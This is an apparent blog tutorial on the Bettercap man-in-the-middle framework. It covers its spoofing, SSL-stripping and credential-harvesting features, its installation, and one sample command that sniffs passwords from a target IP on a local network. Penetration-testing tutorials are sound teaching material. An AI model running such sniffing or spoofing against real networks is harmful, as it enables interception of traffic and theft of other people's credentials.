Bettercap : MITM Framework for Penetration Testers
Man in the Middle attacks are very common while penetration
testing and opens path for a variety of other network based
attacks namely Password Sniffing , SSL strip and lots of more .
Well we have a new framework for MITM Testing called
BETTERCAP . Easy to integrate in Ubuntu or Kali (or whatever
you use as your penetration testing Linux Distro) Bettercap
comes with a lot of Extensible features. This is a Tutorial on
the capabilities of Bettercap and How to effectively use Bettercap
.
What is Bettercap?
BetterCAP is a powerful MITM Framework, open-source tool
to perform various types of Man-In-The-Middle attacks against
the network, manipulate HTTP and HTTPS traffic in realtime and
much more. There are a lot of Extensible Features in Bettercap
most important of which are listed here :
Some of the main features include:
Full and half duplex ARP spoofing.
The first real ICMP DoubleDirect spoofing implementation.
Configurable DNS spoofing.
Realtime and completely automatized host discovery.
Realtime credentials harvesting for protocols such as HTTP(S)
POSTed data, Basic and Digest Authentications, FTP, IRC,
POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc ) and
more.
Fully customizable network sniffer.
Modular HTTP and HTTPS transparent proxies with support for
user plugins + builtin plugins to inject custom HTML code, JS
or CSS files and URLs.
SSLStripping.
Builtin HTTP server.
MITM Framework
Why don’t I simply use ettercap instead?
Ettercap filters do not work most of the times, are outdated
and hard to implement due to the specific language they’re
implemented in.
Ettercap is freaking unstable on big networks … try to launch
the host discovery on a bigger network rather than the
usual /24 ;)
Unless you’re a C/C++ developer, you can’t easily extend
ettercap or make your own module.
Ettercap’s ICMP spoofing is completely useless.
Ettercap does not provide a builtin and modular HTTP(S)
transparent proxy.
Ettercap does not provide a smart and fully customizable
credentials sniffer.
Here is the official Documentation link to Bettercap – https://
bettercap.org/docs/intro/
Installation
Before we get to installing the actual bettercap package, we’re
going to want to resolve all of the dependencies using aptitude.
the following dependencies are required in order to run bettercap:
build-essential
ruby-dev
libpcap-dev
Code:
sudo apt-get install build-essential
ruby-dev libpcap-dev
Once your dependencies have finished downloading and installing,
let’s install bettercap using the ruby package manager.
Code:
sudo gem install bettercap
This is all you need to get started with the Bettercap MITM
Framework toolkit .
A simple Credential stealing attack can be done using the
following command :
sudo bettercap -X --custom-parser "
password" -T 192.168.100.101
The -X parameter is what enables the sniffer, while the –
custom-parser parameter allows the user to pass an argument to
match a specific regular expression within the captured packets.
this is what makes Bettercap’s sniffer so useful.
-T option is for the Target .
#Purely for educational purposes . Penetration
testing without Authorization is Illegal